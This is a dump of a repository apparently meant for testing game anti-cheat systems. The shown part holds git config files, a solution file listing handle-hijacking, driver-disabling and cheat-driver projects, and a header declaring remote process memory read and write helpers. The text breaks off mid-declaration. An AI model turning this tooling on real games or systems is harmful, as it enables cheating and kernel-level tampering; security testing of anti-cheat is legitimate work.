├── .gitattributes ├── .gitignore ├── .gitmodules ├── AntiCheat-Testing-Framework.sln ├── CheatHelper ├── CheatHelper.cpp ├── CheatHelper.h ├── CheatHelper.vcxproj ├── CheatHelper.vcxproj.filters ├── Readme.md ├── ZwReadWriteVM.asm ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── DriverDisabler ├── DriverDisabler.cpp ├── DriverDisabler.vcxproj ├── DriverDisabler.vcxproj.filters ├── README.md ├── pch.cpp └── pch.h ├── DriverHelper ├── DriverHelper.cpp ├── DriverHelper.h ├── DriverHelper.vcxproj ├── DriverHelper.vcxproj.filters ├── Readme.md ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── DriverTester ├── DriverTester.cpp ├── DriverTester.vcxproj ├── DriverTester.vcxproj.filters ├── LoadDriver.bat ├── Readme.md ├── pch.cpp └── pch.h ├── ExternalCheatDriver ├── ExternalCheatDriver.cpp ├── ExternalCheatDriver.vcxproj ├── HandleElevationDriver.vcxproj.filters ├── LoadDriver.bat ├── Readme.md ├── pch.cpp └── pch.h ├── HandleElevationDriver ├── HandleElevationDriver.cpp ├── HandleElevationDriver.vcxproj ├── HandleElevationDriver.vcxproj.filters ├── LoadDriver.bat ├── Readme.md ├── pch.cpp └── pch.h ├── HandleHijackingDLL ├── HandleHijackingDLL.cpp ├── HandleHijackingDLL.vcxproj ├── HandleHijackingDLL.vcxproj.filters ├── README.md ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── HandleHijackingMaster ├── HandleHijackingMaster.cpp ├── HandleHijackingMaster.vcxproj ├── HandleHijackingMaster.vcxproj.filters ├── README.md ├── pch.cpp └── pch.h ├── README.md ├── StealthHijackingNormalDLL ├── Readme.md ├── StealthHijackingNormalDLL.cpp ├── StealthHijackingNormalDLL.vcxproj ├── StealthHijackingNormalDLL.vcxproj.filters ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── StealthHijackingNormalMaster ├── Readme.md ├── StealthHijackingNormalMaster.cpp ├── StealthHijackingNormalMaster.vcxproj ├── StealthHijackingNormalMaster.vcxproj.filters ├── pch.cpp └── pch.h ├── config.ini └── resources └── MinHook ├── include └── MinHook.h └── lib └── libMinHook-x64-v141-mdd.lib /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | *.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | # Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc 262 | 263 | # IDA Files 264 | *.id0 265 | *.id1 266 | *.nam 267 | *.til 268 | *.i64 269 | 270 | # Libs and Drivers and back up files 271 | config.ini_apex 272 | config.ini_bdo 273 | *.sys 274 | /resources/gdrv.sys 275 | /resources/rzpnk.sys 276 | /resources/gdrv.i64 277 | /resources/rzpnk.i64 278 | /resources/rzpnk.id0 279 | /resources/rzpnk.id1 280 | /resources/rzpnk.nam 281 | /resources/rzpnk.til 282 | /resources/rzpnk_20190322115842.i64 283 | /resources/MinHook/lib/libMinHook-x86-v90-mtd.lib 284 | /resources/MinHook/lib/libMinHook-x86-v90-mt.lib 285 | /resources/MinHook/lib/libMinHook-x86-v90-mdd.lib 286 | /resources/MinHook/lib/libMinHook-x86-v90-md.lib 287 | /resources/MinHook/lib/libMinHook-x86-v141-mtd.lib 288 | /resources/MinHook/lib/libMinHook-x86-v141-mt.lib 289 | /resources/MinHook/lib/libMinHook-x86-v141-mdd.lib 290 | /resources/MinHook/lib/libMinHook-x86-v141-md.lib 291 | /resources/MinHook/lib/libMinHook-x86-v140-mtd.lib 292 | /resources/MinHook/lib/libMinHook-x86-v140-mt.lib 293 | /resources/MinHook/lib/libMinHook-x86-v140-mdd.lib 294 | /resources/MinHook/lib/libMinHook-x86-v140-md.lib 295 | /resources/MinHook/lib/libMinHook-x86-v120-mtd.lib 296 | /resources/MinHook/lib/libMinHook-x86-v120-mt.lib 297 | /resources/MinHook/lib/libMinHook-x86-v120-mdd.lib 298 | /resources/MinHook/lib/libMinHook-x86-v120-md.lib 299 | /resources/MinHook/lib/libMinHook-x86-v110-mtd.lib 300 | /resources/MinHook/lib/libMinHook-x86-v110-mt.lib 301 | /resources/MinHook/lib/libMinHook-x86-v110-mdd.lib 302 | /resources/MinHook/lib/libMinHook-x86-v110-md.lib 303 | /resources/MinHook/lib/libMinHook-x86-v100-mtd.lib 304 | /resources/MinHook/lib/libMinHook-x86-v100-mt.lib 305 | /resources/MinHook/lib/libMinHook-x86-v100-mdd.lib 306 | /resources/MinHook/lib/libMinHook-x86-v100-md.lib 307 | /resources/MinHook/lib/libMinHook-x64-v90-mtd.lib 308 | /resources/MinHook/lib/libMinHook-x64-v90-mt.lib 309 | /resources/MinHook/lib/libMinHook-x64-v90-mdd.lib 310 | /resources/MinHook/lib/libMinHook-x64-v90-md.lib 311 | /resources/MinHook/lib/libMinHook-x64-v141-mtd.lib 312 | /resources/MinHook/lib/libMinHook-x64-v141-mt.lib 313 | /resources/MinHook/lib/libMinHook-x64-v141-md.lib 314 | /resources/MinHook/lib/libMinHook-x64-v140-mtd.lib 315 | /resources/MinHook/lib/libMinHook-x64-v140-mt.lib 316 | /resources/MinHook/lib/libMinHook-x64-v140-mdd.lib 317 | /resources/MinHook/lib/libMinHook-x64-v140-md.lib 318 | /resources/MinHook/lib/libMinHook-x64-v120-mtd.lib 319 | /resources/MinHook/lib/libMinHook-x64-v120-mt.lib 320 | /resources/MinHook/lib/libMinHook-x64-v120-mdd.lib 321 | /resources/MinHook/lib/libMinHook-x64-v120-md.lib 322 | /resources/MinHook/lib/libMinHook-x64-v110-mtd.lib 323 | /resources/MinHook/lib/libMinHook-x64-v110-mt.lib 324 | /resources/MinHook/lib/libMinHook-x64-v110-mdd.lib 325 | /resources/MinHook/lib/libMinHook-x64-v110-md.lib 326 | /resources/MinHook/lib/libMinHook-x64-v100-mtd.lib 327 | /resources/MinHook/lib/libMinHook-x64-v100-mt.lib 328 | /resources/MinHook/lib/libMinHook-x64-v100-mdd.lib 329 | /resources/MinHook/lib/libMinHook-x64-v100-md.lib 330 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "LuaHook"] 2 | path = LuaHook 3 | url = https://github.com/niemand-sec/LuaHook.git 4 | branch = ACTF 5 | -------------------------------------------------------------------------------- /AntiCheat-Testing-Framework.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.168 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HandleHijackingDLL", "HandleHijackingDLL\HandleHijackingDLL.vcxproj", "{FA4A27D2-1F04-4DDA-A10C-D19640522328}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HandleHijackingMaster", "HandleHijackingMaster\HandleHijackingMaster.vcxproj", "{8B5D48FC-71B6-40DA-9415-64CF55DC29FF}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CheatHelper", "CheatHelper\CheatHelper.vcxproj", "{A080C117-D1DB-4671-8217-65496573BA4D}" 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DriverDisabler", "DriverDisabler\DriverDisabler.vcxproj", "{723D6B45-EEBA-4C09-8528-4373BAFF330A}" 13 | EndProject 14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StealthHijackingNormalMaster", "StealthHijackingNormalMaster\StealthHijackingNormalMaster.vcxproj", "{F74258DB-52A4-4B60-8FBE-385091D35DCA}" 15 | EndProject 16 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StealthHijackingNormalDLL", "StealthHijackingNormalDLL\StealthHijackingNormalDLL.vcxproj", "{09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}" 17 | EndProject 18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DriverTester", "DriverTester\DriverTester.vcxproj", "{D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}" 19 | EndProject 20 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HandleElevationDriver", "HandleElevationDriver\HandleElevationDriver.vcxproj", "{97D0792B-4385-450B-9E85-79494037D730}" 21 | EndProject 22 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DriverHelper", "DriverHelper\DriverHelper.vcxproj", "{36244BA2-D910-4746-8ED2-7CFA55FB4DE9}" 23 | EndProject 24 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExternalCheatDriver", "ExternalCheatDriver\ExternalCheatDriver.vcxproj", "{99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}" 25 | EndProject 26 | Global 27 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 28 | Debug|x64 = Debug|x64 29 | Debug|x86 = Debug|x86 30 | Release|x64 = Release|x64 31 | Release|x86 = Release|x86 32 | EndGlobalSection 33 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 34 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Debug|x64.ActiveCfg = Debug|x64 35 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Debug|x64.Build.0 = Debug|x64 36 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Debug|x86.ActiveCfg = Debug|Win32 37 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Debug|x86.Build.0 = Debug|Win32 38 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Release|x64.ActiveCfg = Release|x64 39 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Release|x64.Build.0 = Release|x64 40 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Release|x86.ActiveCfg = Release|Win32 41 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Release|x86.Build.0 = Release|Win32 42 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Debug|x64.ActiveCfg = Debug|x64 43 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Debug|x64.Build.0 = Debug|x64 44 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Debug|x86.ActiveCfg = Debug|Win32 45 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Debug|x86.Build.0 = Debug|Win32 46 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Release|x64.ActiveCfg = Release|x64 47 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Release|x64.Build.0 = Release|x64 48 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Release|x86.ActiveCfg = Release|Win32 49 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Release|x86.Build.0 = Release|Win32 50 | {A080C117-D1DB-4671-8217-65496573BA4D}.Debug|x64.ActiveCfg = Debug|x64 51 | {A080C117-D1DB-4671-8217-65496573BA4D}.Debug|x64.Build.0 = Debug|x64 52 | {A080C117-D1DB-4671-8217-65496573BA4D}.Debug|x86.ActiveCfg = Debug|Win32 53 | {A080C117-D1DB-4671-8217-65496573BA4D}.Debug|x86.Build.0 = Debug|Win32 54 | {A080C117-D1DB-4671-8217-65496573BA4D}.Release|x64.ActiveCfg = Release|x64 55 | {A080C117-D1DB-4671-8217-65496573BA4D}.Release|x64.Build.0 = Release|x64 56 | {A080C117-D1DB-4671-8217-65496573BA4D}.Release|x86.ActiveCfg = Release|Win32 57 | {A080C117-D1DB-4671-8217-65496573BA4D}.Release|x86.Build.0 = Release|Win32 58 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Debug|x64.ActiveCfg = Debug|x64 59 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Debug|x64.Build.0 = Debug|x64 60 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Debug|x86.ActiveCfg = Debug|Win32 61 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Debug|x86.Build.0 = Debug|Win32 62 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Release|x64.ActiveCfg = Release|x64 63 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Release|x64.Build.0 = Release|x64 64 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Release|x86.ActiveCfg = Release|Win32 65 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Release|x86.Build.0 = Release|Win32 66 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Debug|x64.ActiveCfg = Debug|x64 67 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Debug|x64.Build.0 = Debug|x64 68 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Debug|x86.ActiveCfg = Debug|Win32 69 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Debug|x86.Build.0 = Debug|Win32 70 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Release|x64.ActiveCfg = Release|x64 71 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Release|x64.Build.0 = Release|x64 72 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Release|x86.ActiveCfg = Release|Win32 73 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Release|x86.Build.0 = Release|Win32 74 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Debug|x64.ActiveCfg = Debug|x64 75 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Debug|x64.Build.0 = Debug|x64 76 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Debug|x86.ActiveCfg = Debug|Win32 77 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Debug|x86.Build.0 = Debug|Win32 78 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Release|x64.ActiveCfg = Release|x64 79 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Release|x64.Build.0 = Release|x64 80 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Release|x86.ActiveCfg = Release|Win32 81 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Release|x86.Build.0 = Release|Win32 82 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Debug|x64.ActiveCfg = Debug|x64 83 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Debug|x64.Build.0 = Debug|x64 84 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Debug|x86.ActiveCfg = Debug|Win32 85 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Debug|x86.Build.0 = Debug|Win32 86 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Release|x64.ActiveCfg = Release|x64 87 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Release|x64.Build.0 = Release|x64 88 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Release|x86.ActiveCfg = Release|Win32 89 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Release|x86.Build.0 = Release|Win32 90 | {97D0792B-4385-450B-9E85-79494037D730}.Debug|x64.ActiveCfg = Debug|x64 91 | {97D0792B-4385-450B-9E85-79494037D730}.Debug|x64.Build.0 = Debug|x64 92 | {97D0792B-4385-450B-9E85-79494037D730}.Debug|x86.ActiveCfg = Debug|Win32 93 | {97D0792B-4385-450B-9E85-79494037D730}.Debug|x86.Build.0 = Debug|Win32 94 | {97D0792B-4385-450B-9E85-79494037D730}.Release|x64.ActiveCfg = Release|x64 95 | {97D0792B-4385-450B-9E85-79494037D730}.Release|x64.Build.0 = Release|x64 96 | {97D0792B-4385-450B-9E85-79494037D730}.Release|x86.ActiveCfg = Release|Win32 97 | {97D0792B-4385-450B-9E85-79494037D730}.Release|x86.Build.0 = Release|Win32 98 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Debug|x64.ActiveCfg = Debug|x64 99 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Debug|x64.Build.0 = Debug|x64 100 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Debug|x86.ActiveCfg = Debug|Win32 101 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Debug|x86.Build.0 = Debug|Win32 102 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Release|x64.ActiveCfg = Release|x64 103 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Release|x64.Build.0 = Release|x64 104 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Release|x86.ActiveCfg = Release|Win32 105 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Release|x86.Build.0 = Release|Win32 106 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Debug|x64.ActiveCfg = Debug|x64 107 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Debug|x64.Build.0 = Debug|x64 108 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Debug|x86.ActiveCfg = Debug|Win32 109 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Debug|x86.Build.0 = Debug|Win32 110 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Release|x64.ActiveCfg = Release|x64 111 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Release|x64.Build.0 = Release|x64 112 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Release|x86.ActiveCfg = Release|Win32 113 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Release|x86.Build.0 = Release|Win32 114 | EndGlobalSection 115 | GlobalSection(SolutionProperties) = preSolution 116 | HideSolutionNode = FALSE 117 | EndGlobalSection 118 | GlobalSection(ExtensibilityGlobals) = postSolution 119 | SolutionGuid = {4B354B9C-B814-457A-8FF5-722BFE9C944E} 120 | EndGlobalSection 121 | EndGlobal 122 | -------------------------------------------------------------------------------- /CheatHelper/CheatHelper.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | #define BUFSIZE 100 6 | #define FILEMAPSIZE 4096 7 | 8 | typedef LONG(WINAPI *TNtReadVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded); 9 | typedef LONG(WINAPI *TNtWriteVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); 10 | 11 | 12 | struct PipeMessageRequest { 13 | int action = 0; 14 | HANDLE handle = 0; 15 | intptr_t address = 0; 16 | int size = BUFSIZE; 17 | char buffer[BUFSIZE] = { "" }; 18 | }; 19 | 20 | struct PipeMessageResponse { 21 | int status = 0; 22 | SIZE_T bytesRead = 0; 23 | char buffer[BUFSIZE] = { "" }; 24 | }; 25 | 26 | class CheatHelper 27 | { 28 | public: 29 | // WINAPI Functions 30 | static void Suspend(DWORD processId); 31 | static void Resume(DWORD processId); 32 | // Process Functions 33 | static DWORD GetProcId(char* procName); 34 | // Debuging Functions 35 | static void ConsoleSetup(const char * title); 36 | static void PrintBytes(PVOID buffer, SIZE_T nSize); 37 | // Memory functions 38 | static int RPM(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 39 | static int WPM(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 40 | static int NtRVM(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded); 41 | static int NtWVM(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); 42 | static int ZwRVM(HANDLE hProc, PVOID pBaseAddress, PVOID pBuffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded); 43 | static int ZwWVM(HANDLE hProc, PVOID pBaseAddress, PVOID pBuffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); 44 | //DX functions 45 | //DX11 functions 46 | 47 | //FileMapping 48 | static bool checkSpinLockByte(LPVOID pFileMapMem, BYTE value); 49 | static bool setSpinLockByte(LPVOID pFileMapMem, BYTE value); 50 | static void prepareRequest(PipeMessageRequest &PMRequest); 51 | 52 | // Configuration file (INI) 53 | static bool loadConfig(); 54 | 55 | //States 56 | static bool bDelayExecution; 57 | 58 | 59 | //Addresses 60 | static intptr_t RPMAddressHigh; 61 | static intptr_t RPMAddressLow; 62 | static intptr_t RPMAddress; 63 | static intptr_t WPMAddressHigh; 64 | static intptr_t WPMAddressLow; 65 | static intptr_t WPMAddress; 66 | static intptr_t ntRVMAddress; 67 | static intptr_t ntRVMAddressHigh; 68 | static intptr_t ntRVMAddressLow; 69 | static intptr_t ntWVMAddress; 70 | static intptr_t ntWVMAddressHigh; 71 | static intptr_t ntWVMAddressLow; 72 | static intptr_t ZwRVMAddressHigh; 73 | static intptr_t ZwRVMAddressLow; 74 | static intptr_t ZwRVMAddress; 75 | static intptr_t ZwWVMAddressHigh; 76 | static intptr_t ZwWVMAddressLow; 77 | static intptr_t ZwWVMAddress; 78 | 79 | static DWORDLONG startAddressPhyHigh; //Phy address 80 | static DWORDLONG startAddressPhyLow; //Phy address 81 | static DWORDLONG startAddressPhy; //Phy address 82 | 83 | //Handles 84 | static HANDLE requestHandleNP; 85 | static HANDLE requestHandleFM; 86 | static HANDLE requestHandleDrv; 87 | 88 | 89 | 90 | //Buffers 91 | static char RPMBuffer[BUFSIZE]; 92 | static char WPMBuffer[BUFSIZE]; 93 | static char ntRVMBuffer[BUFSIZE]; 94 | static char ntWVMBuffer[BUFSIZE]; 95 | static char ZwRVMBuffer[BUFSIZE]; 96 | static char 